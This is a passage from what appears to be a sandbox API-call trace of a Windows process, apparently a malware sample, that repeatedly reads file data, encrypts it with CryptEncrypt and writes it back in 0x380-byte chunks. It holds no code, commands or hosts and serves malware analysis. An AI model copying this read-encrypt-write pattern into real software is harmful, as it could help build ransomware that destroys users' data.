hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.376] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.377] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.377] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.377] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.377] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.377] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.377] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.378] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.378] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.379] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.380] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.381] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.382] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, 